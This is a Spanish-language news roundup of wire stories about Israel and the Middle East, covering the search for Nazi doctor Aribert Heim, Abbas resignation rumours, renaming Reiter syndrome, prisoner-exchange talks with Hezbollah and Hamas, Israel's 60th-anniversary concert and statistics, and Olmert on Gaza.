El criminal de guerra nazi Aribert Heim podría residir en Argentina, según dijo el director de la oficina del Centro Simón Wiesenthal, de Israel, Efraim Zuroff.

Heim era apodado "Doctor muerte" por sus crímenes cometidos en un campo de concentración durante la Segunda Guerra Mundial.

Según declaró Zuroff a la Agencia Judía de Noticias, el ex jerarca del Tercer Reich podría estar viviendo "en Argentina o Chile".

Zuroff sostuvo que el Centro Wiesenthal está "buscando desde hace tres años y medio" a Heim, aunque admitió que "si supiéramos con exactitud dónde vive, ya estaría en nuestras manos". Heim es uno de los diez criminales nazis más buscado en el mundo, estaría vivo -pese a que su familia lo desmiente- y escondido en la región patagónica de Chile o Argentina.

El diario chileno El Mercurio dijo que la hija de Heim, una farmacéutica conocida con el nombre de Waltraut Bˆser, viviría junto a sus tres hijos en Puerto Varas, una localidad cercana a Puerto Montt.

En febrero último, la Justicia chilena recibió el segundo pedido de captura internacional del ex oficial nazi.

La policía alemana visitó la zona el año pasado, pero no encontró rastros de Heim.
Fuente: LosAndes

Leer todo...

Desmienten rumores sobre posible dimisión del presidente palestino Mahmud Abbas

El consejero del presidente palestino Nabil Abú Rudeina desmintió hoy los rumores sobre una posible dimisión de Mahmud Abbas si llega a fracasar el proceso de paz con Israel.




"El líder palestino se propone seguir adelante y aplicará todos sus esfuerzos para hacer realidad el sueño de un Estado palestino con la capital en Jerusalén", manifestó Abú Rudeina citado por la agencia de noticias WAFA.

Los medios de prensa de Israel informaron que Mahmud Abbas pensaba abandonar su cargo si hasta el fin de año no consigue firmar con Israel el acuerdo sobre el arreglo definitivo del conflicto.

Los periodistas afirman que fue el propio Abbas quien habló de su posible dimisión durante una entrevista con Yosi Beilin, líder del partido de izquierda israelí "Meretz".
Fuente: Ajencia Rusa de Información

Leer todo...

Médicos israelíes piden retirar nombre de doctor nazi de un tipo de síndrome

Un grupo de médicos israelíes ha pedido a sus colegas que dejen de emplear el término 'síndrome de Reiter', que popularizó el doctor nazi Hans Reiter, condenado en Nuremberg por sus mortíferos experimentos en campos de concentración nazis.

'El término síndrome de Reiter es un epónimo que debe ser borrado de las publicaciones médicas, principalmente por criterios morales', argumentan Yoav Keynan y Doron Rimar, del Instituto Technión de Haifa (norte de Israel), en un artículo en el 'Israel Medical Association Journal'.

Los científicos proponen emplear 'artritis reactiva' en vez de 'síndrome de Reiter', que define la combinación de tres síntomas -artritis, uretritis y conjuntivitis- durante o tras episodios de diarrea o uretritis.

Keynan y Rimar recurren, para ello, a cuatro argumentos.

El primero es que la tríada descrita en el 'síndrome de Reiter' es 'demasiado restrictiva'; el segundo que 'es preferible un término más descriptivo que un epónimo'; tercero, que 'Reiter no fue el primero en describir el síndrome y, por último pero no por ello menos importante, está la cuestión moral'.

Descubierto probablemente en tiempos de Hipócrates, el síndrome fue descrito en cinco pacientes por el cirujano inglés Benjamin Brodie en 1818, explican los médicos israelíes en el artículo, publicado en el último número de la revista.

Los investigadores franceses Noel Fiessinger y Edgar LeRoy también relataron los síntomas del síndrome en un texto de 1916, aparecido una semana antes del que hizo famoso a Reiter, pese a que atribuyese erróneamente la enfermedad a una infección espiroqueta y especulase con su trasmisión por mosquitos.

No obstante, el término 'síndrome de Reiter' ganó popularidad hasta que en 1977 comenzó una campaña para desterrar esa denominación.

Tras sondear los textos científicos israelíes recientes, Keynan y Rimar han hallado un descenso en el empleo del epónimo entre 2003 (dieciocho por ciento) y 2007 (nueve por ciento).

Sin embargo, trece de los catorce libros de texto aún lo usan, así como la mitad de las cuatro escuelas médicas del Estado judío.

Reiter fue condenado en los juicios de Nuremberg por la muerte de más de 250 presos en diversos experimentos en el campo de concentración de Buchenwald y por su participación en los programas de 'eutanasia' e 'higiene racial', sobre la que escribió el libro 'Deutsches Gold, Gesundes Leben - Frohes Schaffen'.

'Reiter difamó a toda la profesión y a la ciencia médica. Es inconsistente con los principios médicos honrar esta abominación', sentencian los investigadores israelíes.
Fuente: Terra

Leer todo...

Israel no negociará con Hezbalá la liberación de palestinos (solo libaneses)


El gobierno israelí no pondrá en libertad a prisioneros palestinos a cambio de dos soldados secuestrados por Hezbalá, según informó recientemente a la organización libanesa. Y si la milicia chiíta continúa insistiendo que los palestinos sean incluidos en el acuerdo, Israel podría salirse de las negociaciones, según indicó un alto funcionario familiarizado con las conversaciones.

En ese caso, el funcionario añadió, Israel tendía que evaluar todo la inteligencia sobre los dos soldados y decidir si justifica declararlos muertos.

Udi Goldwasser y Eldad Regev fueron tomados por rehenes por Hezbalá en un operativo a través de la frontera el 12 de julio de 2006. Su secuestro dio inicio a la Segunda Guerra del Líbano. Desde la guerra, Israel y Hezbalá han venido llevando a cabo negociaciones indirectas sobre un intercambio de prisioneros a través de un mediador alemán, Gerhard Konrad. Ofer Dekel, a quien el primer ministro Ehud Olmert designó para conducir las conversaciones por el lado israelí, se reúne frecuentemente con Konrad en Europa.

Israel pidió recientemente a Konrad que le diera a Hezbalá lo que denominó como su “oferta final”; a cambio de los dos soldados, o de sus cuerpos si están muertos, Israel liberará prisioneros libaneses. El gobierno israelí regresaría también los cuerpos de los miembros de Hezbalá enterrados en Israel, pero no liberaría ningún palestino.

“Desde la perspectiva de Israel, hemos alcanzado los límites extremos de las negociaciones”, aseguró el alto funcionario. “La pelota está ahora del lado de Hezbalá, y debe tomar una decisión”.

A lo largo de las conversaciones, Hezbalá ha insistido en que Israel liberara a miles de palestinos además de los prisioneros libaneses. Pero esto fortalecería la posición de la organización radical chiíta entre los palestinos y el mundo árabe como un todo, cuestión que Israel no quiere hacer, explicó el funcionario.

Si Hezbalá insiste en incluir prisioneros palestinos, agregó el funcionario, eso provocaría “un fin a las negociaciones porque no habrá nada sobre qué hablar”. En ese caso, Israel tendría que considerar clasificar a Regev y Goldwasser no como perdidos en combate (MIA por sus siglas en inglés) sino como soldados caídos cuyo lugar de sepultura es desconocido.

El Gran Rabino de las Fuerzas de Defensa Israelíes (IDF por sus siglas en inglés) es el responsable de tomar esta decisión, pero debe basarse en inteligencia sólida e información médica que indiquen que los dos están muertos –evidencia que las IDF no creen tener.


El mensaje de Israel a Hezbalá:

- No liberará palestinos a cambio de los soldados israelíes Eldad Regev y Ehud Goldwasser.

- La insistencia de Hezbalá en liberar palestinos llevará al fin de las negociaciones.

- Israel concluye que Hezbalá no está interesado en proveer una prueba de vida de los soldados.

- Israel considerará declarar a Regev y Goldwasser como víctimas fatales cuyo lugar de sepultura se desconoce.

- Israel quiere liberar prisioneros libaneses, incluido Samir Kuntar, quien no es miembro de Hezbalá y cuyo ataque terrorista fue realizado en representación de un grupo palestino, el Frente Palestino de Liberación.

- Israel demandará información sobre Ron Arad –un piloto de la fuerza aérea israelí que ha estado desaparecido desde que su avión fue derribado sobre Líbano en 1986-, a cambio de la liberación de Kuntar.
Fuente: ADN Mundo

Leer todo...

Celebra Filarmónica de Israel los 60 años del país con Zubin Mehta

En el concierto de gala el domingo por la noche estuvieron presentes la presidenta de la Cámara de Representantes estadounidense, Nancy Pelosi, así como su homóloga israelí, Dalia Izik.

Tel Aviv.- La Orquesta Filarmónica de Israel celebró el 60 aniversario del país con un concierto especial a cargo del célebre dirigente indio Zubin Mehta.

En el concierto de gala el domingo por la noche estuvieron presentes la presidenta de la Cámara de Representantes estadounidense, Nancy Pelosi, así como su homóloga israelí, Dalia Izik.

En un discurso festivo, Pelosi subrayó los valores democráticos compartidos por ambos países.

La Orquesta Sinfónica tocó en primer lugar “Tehilim”, del compositor israelí nacido en Munich Paul Ben-Chaim. Luego, la clarinetista Sharon Kam interpretó un concierto para clarinete de Carl Maria von Weber, aunque el momento culminante de la noche fue la Primera Sinfonía de Gustav Mahler, que tocaron juntas la Orquesta Sinfónica y la Filarmónica de Israel bajo la batuta de Mehta.

El público mostró su entusiasmo al final con aplausos y gritos de “bravo” durante varios minutos.

En medio de la presentación, una película mostró los 70 años de historia de la Filarmónica, en la que se vieron imágenes como la que mostraba al violinista Isaac Stern tocando durante la Guerra del Golfo en 1991 ante un público con máscaras de gas, mientras sonaban las sirenas de alarma por un ataque de un misil iraquí.

El film también honró a Mehta, que en 1981 se convirtió en director musical de por vida de la Filarmónica.

Con motivo del 60 aniversario de Israel la orquesta realizará una serie de conciertos con directores y artistas internacionales destacados.

El de cierre será el 2 de junio con el alemán Kurt Masur, cuando se tocará la obertura “Las Hébridas”, así como las sinfonías escosesa e italiana de Felix Mendelssohn Bartholdy.
Fuente: Milenio

Leer todo...

Cifras de Israel en el sesenta aniversario

La Oficina Central de Estadísticas dio a conocer cifras actualidades acerca de la sociedad y la economía del país al celebrarse los 60 años de su fundación.

El número de habitantes que en 1948 era estimado en 806.000 personas pasó a 7.282.000.
De estos, 5.5 millones son judíos, 1.461.000 pertenecen a la minoría árabe y el resto pertenecen a otras nacionalidades.
En 1948, apenas un 35% de los habitantes había nacido en Israel, mientras que ahora son casi 70%.
La Oficina destaca que durante los últimos doce meses nacieron 156.400 nuevos israelíes y otros 18.000 llegaron desde el exterior como olim.

Junto con estas cifras alentadoras, el informe revela que la densidad de población pasó de 43 personas por kilómetro cuadrado en 1948 a 310 en el presente.
En Tel Aviv, por ejemplo, el número se eleva a 7.000.
La sensación de que hay muchas personas concentradas en poco espacio no es algo personal sino que tiene una base numérica que lo respalda.
El número de ciudades con más de 100.000 habitantes pasó de uno en 1948 a catorce en este año.

Con respecto a la educación, el progreso es ostensible.
El nivel está en aumento constante, afirman los expertos: el porcentaje de adultos que no pasó por la escuela se redujo del 16% en 1961 a 3% en 2007.
En 1948, apenas 208 personas recibieron un título académico de los únicos institutos que funcionaban, la Universidad Hebra y el Tejnión.
En 2006, los recipientes fueron 53.000, que completaron su título en alguna de las 62 universidades y academias de estudios superiores dispersa por el país.

Los cambios en materia económica son significativos.
El Producto Bruto Interno, a precios constantes, subió como promedio en 5% a 6% anual desde 1950 y el PBI per cápita, creció en promedio de 3% anual en el mismo período.
Esto significa que el PBI se multiplicó por seis.

Las cifras relativas a las exportaciones ofrecen un panorama preciso sobre la evolución económica de Israel.
En 1950, las exportaciones fueron de 35 millones de dólares.
La mitad eran productos agrícolas.
En 2007, los envíos al exterior alcanzaron a 46.000 millones de dólares.
De este total, un 75% fueron productos industriales, otro 23% diamantes y el rubro agrícola aportó solamente el 3%.

Fuente: Aurora

Leer todo...

Abas dimitirá si no hay acuerdo con Israel este año

El presidente palestino, Mahmud Abas, tiene la intención de dimitir si no se llega a un acuerdo de paz con Israel este año, indicó el domingo el diputado israelí Yossi Beilin tras reunirse con él.



"Abú Mazen (Abas) no es completamente pesimista sobre la posibilidad de un acuerdo, pero me ha dicho aún queda una gran distancia entre ambas partes y que tiene la intención de dimitir si no hay acuerdo en los próximos seis meses", declaró Beilin a la radio del ejército israelí.

Abas se entrevisto el sábado con el presidente estadounidense George W. Bush al margen de una conferencia económica internacional en Charm el Cheij.

Beilin, ex ministro y diputado del partido laico de izquierdas Meretz, es promotor junto al ex ministro palestino Yasser Abed Rabbo de una iniciativa de paz independiente lanzada en 2003, bajo los auspicios del gobierno suizo.
Fuente: CadenaGlobal

Leer todo...

Israel remite a Hamás una lista de 71 presos que serían liberados a cambio de Shalit

Las autoridades israelíes habrían remitido al Movimiento de Resistencia Islámica (Hamás) una lista con los nombres de 71 palestinos presos en cárceles israelíes que serían puestos en libertad a cambio de la liberación del militar israelí Gilad Shalit, según reveló un dirigente de Hamás en una entrevista publicada hoy por el diario árabe londinense 'Al Hayat', citado por el 'Jerusalem Post'.

El vicepresidente de la oficina política de Hamás, Musa Abú Marzuk, explicó que, a pesar de los avances logrados, su organización se mantiene en sus reivindicaciones y pedirá la liberación de 270 presos. Sin embargo, lamentó Abú Marzuk, Israel rechaza liberar a ningún preso que tenga 'sangre en sus manos'.

Mientras, desde Gaza, otro miembro de Hamás explicó que no descartan incluir la liberación de Shalit en el acuerdo de alto el fuego que ahora mismo negocian con Israel a través de la mediación egipcia. Esta afirmación supone un cambio de actitud de Hamás, que hasta ahora pretendía tratar la liberación de Shalit aparte de la tregua de Gaza.
Fuente: Terra

Leer todo...

Olmert dice que Israel decidirá pronto sobre opciones en Gaza

JERUSALEN - El primer ministro de Israel, Ehud Olmert, informó el domingo a los mediadores de paz egipcios y al grupo palestino Hamas que su país se estaba aproximando rápidamente a una decisión sobre una posible acción militar más amplia en la Franja de Gaza.

Photo

El primer ministro afirmó que la posible ofensiva estaría dirigida a controlar los ataques militantes con proyectiles hacia Israel.

"Basta con decir que estamos convencidos que no se puede permitir que continúe esta situación en el sur," dijo Olmert a su gabinete, refiriéndose a ataques con cohetes a través de la frontera en el sur de Israel.

"Nos estamos aproximando a una encrucijada sobre una decisión de cómo se manejarán las cosas," dijo.

Proyectiles lanzados desde la Franja de Gaza controlada por Hamas causaron la muerte este mes a dos israelíes, aumentando la presión pública sobre Olmert para que tome medidas más fuertes contra los militantes en el territorio.

Israel ha acrecentado en la franja costera sus fatales incursiones aéreas y avances por tierra.

La ministra de Relaciones Exteriores israelí, Tzipi Livni, y el ministro de Defensa, Ehud Barak, planeaban reunirse con el presidente egipcio, Hosni Mubarak, en un foro económico la semana próxima, a fin de discutir la situación de la frontera de Gaza.

Egipto ha estado tratando de mediar una tregua entre Israel y Hamas para evitar una escalada que haría fracasar las negociaciones de paz respaldadas por Estados Unidos entre Olmert y el presidente palestino, Mahmoud Abbas.

Hamas ha ofrecido un cese de hostilidades de seis meses en la Franja de Gaza si Israel levanta un embargo sobre el territorio y reabre los cruces de frontera, una oferta que el jefe de la inteligencia egipcia, Omar Suleiman, presentó a funcionarios israelíes esta semana.

Líderes de Hamas en Gaza y en el exilio planeaban sostener conversaciones el lunes con Suleiman en El Cairo para conocer la respuesta de Israel a la propuesta.

Israel dijo esta semana que un acuerdo con Hamas debe encarar el tema de un soldado israelí cautivo. El movimiento islámico afirmó que el acuerdo de tregua y la liberación de Gilad Shalit, rehén de militantes de Gaza desde el 2006, deben permanecer como asuntos separados.

En la Franja de Gaza, Ismail Haniyeh, un alto líder de Hamas, repitió una oferta de liberar a Shalit a cambio de la liberación de 1.400 palestinos mantenidos en cárceles israelíes.

(Reporte Adicional de Nidal al-Mughrabi en Gaza, escrito por Jeffrey Heller, editado en español por Marion Giraldo)
Fuente: Reuters

Leer todo...